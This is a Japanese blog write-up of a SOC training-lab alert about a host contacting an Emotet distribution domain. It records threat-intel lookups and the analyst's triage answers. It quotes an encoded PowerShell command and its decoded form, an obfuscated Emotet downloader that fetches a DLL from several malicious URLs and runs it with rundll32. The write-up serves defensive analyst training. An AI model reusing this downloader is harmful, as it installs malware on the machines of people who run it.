Details

EventID: 42
Event Time: Jan. 30, 2021, 5:25 p.m.
Rule: SOC111 - Traffic to Malware Domain
Level: Security Analyst
Source Address 172.16.17.19
Source Hostname BellaPRD
Destination Address 45.80.181.51
Destination Hostname casinos-hub[.]com
Username Bella
Request URL http[:]//casinos-hub.com/s/ZQhDyLF/
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Device Action Blocked

playbook

Search Log

まずはアクセス先のIPの確認を行う。

45.80.181.51

VirusTotal: https://www.virustotal.com/gui/ip-address/45.80.181.51
ip-sc : https://ip-sc.net/ja/r/45.80.181.51
シンガポールの特に脅威として判定されていないIPである。しかしドメインの方は、

casinos-hub[.]com

VirusTotal: https://www.virustotal.com/gui/domain/casinos-hub.com
URLhaus: https://urlhaus.abuse.ch/url/972700/
Emotet!
urlscan.io: https://urlscan.io/result/9df2f694-639e-4f89-99d6-48ef765c4cb7/
カジノhub?がemotetを配信していたようだ。つまりこれが、今回のアラートのTraffic to Malware Domainとなる。
ここに接続した後にどうなるかは分からなかった。

Log search - 45.80.181.51

#	DATE	TYPE	SOURCE ADDRESS	SOURCE PORT	DESTINATION ADDRESS	DESTINATION PORT
335	Jan, 30, 2021, 05:25 PM	Proxy	172.16.17.19	13212	45.80.181.51	80

ログにはアラートが上がった時のアクセスのみ。

URL: http://casinos-hub.com/s/ZQhDyLF/
Device Actiov: Blocked

Analyze URL Address

先ほどemotetだと分かってしまったので
Answer :Malicious

Has Anyone Accessed IP/URL/Domain?

アクセスはブロックされた

Device Action Blocked

Answer: Not Accessed

Add Artifacts

Value	Type	Comment
45.80.181.51	IP Address	casinos-hub[.]com in singapore
http[:]//casinos-hub.com/s/ZQhDyLF/	URL Address	emotet download

ちなみに、

Endpoint - BellaPRD

Process Historyから怪しいpowershell スクリプトの実行が見られた。

powershell -w hidden -enc IAAgAHMAZQBUAC0ASQBUAEUAbQAgACgAJwBWAEEAUgBpAEEAQgAnACsAJwBMAEUAOgAnACsAJwBVAGUAQgA1AHAAJwApACAAIAAoACAAIABbAFQAeQBQAGUAXQAoACIAewAwAH0AewA0AH0AewA1AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AIgAtAEYAIAAnAHMAJwAsACcAZABpACcALAAnAE8ALgAnACwAJwByAEUAYwB0ACcALAAnAFkAcwBUAEUAJwAsACcATQAuAGkAJwAsACcATwByAHkAJwApACkAOwAgACAAJABYAHYAMAA1AGIAZQAgACAAPQAgACAAWwB0AFkAUABFAF0AKAAiAHsANAB9AHsAMQB9AHsAMwB9AHsANQB9AHsANgB9AHsAMAB9AHsAMgB9AHsANwB9ACIAIAAtAGYAIAAnAGkAYwBFAHAAbwBpAG4AJwAsACcAbgAnACwAJwBUAG0AYQBOAEEAJwAsACcAZQAnACwAJwBzAFkAcwBUAGUAbQAuACcALAAnAFQALgBTACcALAAnAGUAUgBWACcALAAnAEcAZQBSACcAKQAgADsAIAAkAFAAdQBkAGIAdAA2ADcAPQAkAEgAXwA5AEoAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMAA3AEwAOwAkAEQAMQA5AFEAPQAoACcAWgAnACsAKAAnADEAOAAnACsAJwBGACcAKQApADsAIAAoAFYAYQBSAEkAYQBCAEwAZQAgACgAJwB1AGUAQgA1ACcAKwAnAHAAJwApACAAIAAtAHYAQQBMAHUARQBPACAAKQA6ADoAIgBDAHIAYABlAGAAQQBgAFQARQBgAGQASQByAGUAYwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBaADcAJwArACcAQgAnACsAJwBBAGEANwBqAGYAeABqACcAKQArACcAWgAnACsAKAAnADcAQgAnACsAJwBQAHcAcQByACcAKwAnADMAZAAnACsAJwAwAFoANwAnACkAKwAnAEIAJwApAC4AIgByAGUAYABwAEwAQQBjAGUAIgAoACgAJwBaADcAJwArACcAQgAnACkALAAnAFwAJwApACkAKQA7ACQARAAwADQARQA9ACgAJwBUADIAJwArACcAOABYACcAKQA7ACAAIAAoACAAIABjAEgAaQBsAEQASQBUAEUAbQAgACgAIgB2ACIAKwAiAEEAcgBJAGEAQgBMAEUAOgBYAFYAIgArACIAMAAiACsAIgA1AEIAZQAiACkAIAApAC4AVgBhAEwAVQBlADoAOgAiAFMAYABFAEMAVQBSAGkAVABgAFkAUABSAGAAbwB0AG8AYABDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbABzACcAKwAnADEAMgAnACkAKQA7ACQARgA2ADcATwA9ACgAJwBOACcAKwAoACcAMgA2ACcAKwAnAEoAJwApACkAOwAkAFYAOAB4AGoAdQBiAGYAIAA9ACAAKAAnAEUAJwArACgAJwA0ACcAKwAnADAAVAAnACkAKQA7ACQARwAyAF8AUAA9ACgAJwBMADEAJwArACcAMABMACcAKQA7ACQAWQB0AG4AMgB2ADYAegA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9AEEAJwArACcAYQA3AGoAZgB4AGoAewAwAH0AUAAnACsAJwB3AHEAcgAzAGQAMAB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgACAAWwBDAGgAYQBSAF0AOQAyACkAKwAkAFYAOAB4AGoAdQBiAGYAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAEsAOAA3AE4APQAoACcARAAnACsAKAAnADMAJwArACcAOABWACcAKQApADsAJABWAGUAegAzAGoAbQBjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQAVQBrAGUAawBuAG8AbQA9ACgAKAAnAHMAZwAnACsAJwAgAHkAdwAgAGEAJwApACsAKAAnAGgAOgAvACcAKwAnAC8AeQAnACkAKwAoACcAYQBoACcAKwAnAHkAYQBsACcAKQArACcAaQBzACcAKwAoACcAYQAnACsAJwB5AGEAbQAuACcAKQArACgAJwBjAG8AbQAvAHMAeQAnACsAJwBzAC0AYwAnACsAJwBhAGMAJwApACsAJwBoAGUAJwArACgAJwAvAHQAQQBzAHcALwAhACcAKwAnAHMAJwArACcAZwAnACkAKwAoACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvAGMAYQBzACcAKwAnAGkAJwArACcAbgBvAHMALQBoACcAKwAnAHUAYgAnACsAJwAuAGMAbwAnACsAJwBtAC8AcwAvACcAKwAnAFoAJwApACsAKAAnAFEAaABEAHkAJwArACcATABGAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoADoALwAvAGQAJwArACcAZQBvAGQAaQAnACkAKwAoACcAdABhACcAKwAnAHMAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtACcAKwAnAC8AbgAvAEYAVQBFACcAKQArACgAJwB5AG8ARwAvACEAcwAnACsAJwBnACAAJwApACsAKAAnAHkAdwAgACcAKwAnAGEAaAAnACkAKwAoACcAOgAvACcAKwAnAC8AbQAnACsAJwB0AHMAMgAwADEAOQAtADAAMAAnACkAKwAnADIALQAnACsAJwBzAGkAJwArACgAJwB0AGUAJwArACcAOQAuAGcAdABlACcAKwAnAG0AcAAnACkAKwAoACcAdQAnACsAJwByAGwALgBjACcAKQArACcAbwBtACcAKwAoACcALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAnAGMAbwAnACsAKAAnAG4AdAAnACsAJwBlAG4AdAAvAEUAJwArACcALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIAAnACsAJwBhAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAG8AJwArACgAJwBjAGUAJwArACcAYQBuADQAZwBhAG0AZQByACcAKwAnAHMALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwB3AHAALQBjAG8AJwApACsAKAAnAG4AJwArACcAdABlAG4AdAAvAEcAQQAnACkAKwAoACcAdQBZACcAKwAnAGYALwAnACkAKwAnACEAJwArACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAoACcAYQBoADoALwAvAGEAYwBhAGQAJwArACcAZQBtAGkAJwArACcAYQAnACkAKwAoACcAcAByACcAKwAnAG8AZwByACcAKwAnAGUAJwApACsAJwBzAG8AJwArACgAJwAuACcAKwAnAGMAJwArACcAbwBtAC8AYwBnACcAKQArACgAJwBpACcAKwAnAC0AYgAnACkAKwAoACcAaQBuAC8AWgA1AC8AJwArACcAIQAnACsAJwBzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAJwArACcAOgAvACcAKQArACgAJwAvAG4AZQB3AHQAbwAnACsAJwBwACcAKwAnAC4AbwBuAGUAJwApACsAKAAnAC8AcgAnACsAJwBlAHMAJwApACsAKAAnAHAAJwArACcAbwBuAHMAaQB2AGUAJwApACsAKAAnAHMAJwArACcALwB6AC8AJwApACkALgAiAHIAYABFAHAATABBAGAAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAAnACkAKwAnAHkAJwArACgAJwB3ACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABWAGUAegAzAGoAbQBjACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAcABsAGAASQBUACIAKAAkAFAANQAzAFcAIAArACAAJABQAHUAZABiAHQANgA3ACAAKwAgACQAVwA2ADQATgApADsAJABWADEANgBTAD0AKAAnAFAAJwArACgAJwAzADEAJwArACcATAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwBwAHAAdgBzAGoAYwAgAGkAbgAgACQAVQBrAGUAawBuAG8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AHMAVABlAG0ALgBuAGUAdAAuAFcARQBCAEMAbABJAEUATgBUACkALgAiAGQATwBXAGAATgBsAGAATwBhAGQAZgBgAGkAbABlACIAKAAkAE8AcABwAHYAcwBqAGMALAAgACQAWQB0AG4AMgB2ADYAegApADsAJABFADgAMgBFAD0AKAAnAFYAJwArACgAJwA2ACcAKwAnAF8ATwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACAAJABZAHQAbgAyAHYANgB6ACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAANAAxADMAOAA1ACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbAAnACsAJwBsADMAMgAnACkAIAAkAFkAdABuADIAdgA2AHoALAAoACgAJwBBACcAKwAnAG4AeQBTAHQAJwApACsAJwByACcAKwAoACcAaQAnACsAJwBuAGcAJwApACkALgAiAFQAYABvAHMAYABUAFIAaQBOAGcAIgAoACkAOwAkAFEAXwA3AFcAPQAoACcAWQAxACcAKwAnADIATwAnACkAOwBiAHIAZQBhAGsAOwAkAFMANAAxAE8APQAoACcARQAnACsAKAAnADAAJwArACcAMABGACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEADMAOABaAD0AKAAoACcASAAxACcAKwAnADYAJwApACsAJwBRACcAKQA=

-> base64 decode

seT-ITEm ('VARiAB'+'LE:'+'UeB5p')  (  [TyPe]("{0}{4}{5}{2}{1}{3}{6}"-F 's','di','O.','rEct','YsTE','M.i','Ory'));  $Xv05be  =  [tYPE]("{4}{1}{3}{5}{6}{0}{2}{7}" -f 'icEpoin','n','TmaNA','e','sYsTem.','T.S','eRV','GeR') ; $Pudbt67=$H_9J + [char](33) + $H07L;$D19Q=('Z'+('18'+'F')); (VaRIaBLe ('ueB5'+'p')  -vALuEO )::"Cr`e`A`TE`dIrecTOry"($HOME + ((('Z7'+'B'+'Aa7jfxj')+'Z'+('7B'+'Pwqr'+'3d'+'0Z7')+'B')."re`pLAce"(('Z7'+'B'),'\')));$D04E=('T2'+'8X');  (  cHilDITEm ("v"+"ArIaBLE:XV"+"0"+"5Be") ).VaLUe::"S`ECURiT`YPR`oto`COL" = ('T'+('ls'+'12'));$F67O=('N'+('26'+'J'));$V8xjubf = ('E'+('4'+'0T'));$G2_P=('L1'+'0L');$Ytn2v6z=$HOME+(('{'+'0'+'}A'+'a7jfxj{0}P'+'wqr3d0{'+'0}')  -f  [ChaR]92)+$V8xjubf+'.d' + 'll';$K87N=('D'+('3'+'8V'));$Vez3jmc='h' + 'tt' + 'p';$Ukeknom=(('sg'+' yw a')+('h:/'+'/y')+('ah'+'yal')+'is'+('a'+'yam.')+('com/sy'+'s-c'+'ac')+'he'+('/tAsw/!'+'s'+'g')+(' y'+'w ah:')+('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')+('QhDy'+'LF/!'+'sg y')+('w'+' ah://d'+'eodi')+('ta'+'s')+('.c'+'o')+('m'+'/n/FUE')+('yoG/!s'+'g ')+('yw '+'ah')+(':/'+'/m'+'ts2019-00')+'2-'+'si'+('te'+'9.gte'+'mp')+('u'+'rl.c')+'om'+('/w'+'p')+'-'+'co'+('nt'+'ent/E'+'/')+'!'+'s'+'g'+(' yw '+'ah'+'s://')+'o'+('ce'+'an4gamer'+'s.'+'co')+('m'+'/wp-co')+('n'+'tent/GA')+('uY'+'f/')+'!'+('sg '+'yw ')+('ah://acad'+'emi'+'a')+('pr'+'ogr'+'e')+'so'+('.'+'c'+'om/cg')+('i'+'-b')+('in/Z5/'+'!'+'sg'+' ')+('yw'+' ahs'+':/')+('/newto'+'p'+'.one')+('/r'+'es')+('p'+'onsive')+('s'+'/z/'))."r`EpLA`ce"((('sg'+' ')+'y'+('w '+'ah')),([array]('nj','tr'),'yj','sc',$Vez3jmc,'wd')[3])."spl`IT"($P53W + $Pudbt67 + $W64N);$V16S=('P'+('31'+'L'));foreach ($Oppvsjc in $Ukeknom){try{(&('N'+'ew-Obje'+'ct') SysTem.net.WEBClIENT)."dOW`Nl`Oadf`ile"($Oppvsjc, $Ytn2v6z);$E82E=('V'+('6'+'_O'));If ((&('Get'+'-I'+'tem') $Ytn2v6z)."le`NgTh" -ge 41385) {.('rund'+'l'+'l32') $Ytn2v6z,(('A'+'nySt')+'r'+('i'+'ng'))."T`os`TRiNg"();$Q_7W=('Y1'+'2O');break;$S41O=('E'+('0'+'0F'))}}catch{}}$D38Z=(('H1'+'6')+'Q')

中身を見ると、

('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')

casinos-hub.comへのアクセスが見られる。このスクリプトの実行が今回のアラートに関連する。これが何が原因で実行されてのかは分からない。
Endpointの他のログを見ると、これ以降のログはあるがこれ以前の動きはログが無いために分からない。こういうのは大抵 vbaマクロですかね。

End

f:id:Zarat:20220215180809p:plain — close alert event id 42

emotetのダウンロードを行ったpowershellの実行手段が分からなかったが、アラート単体で終わるものだけでなく前の繋がりが何となくイメージできたのは面白い。
ただ、可能であれば前後の繋がりもEndpoint等のログとして残して欲しい。
大量のログを残す、作るのは難しいからやっていないのかもしれませんが。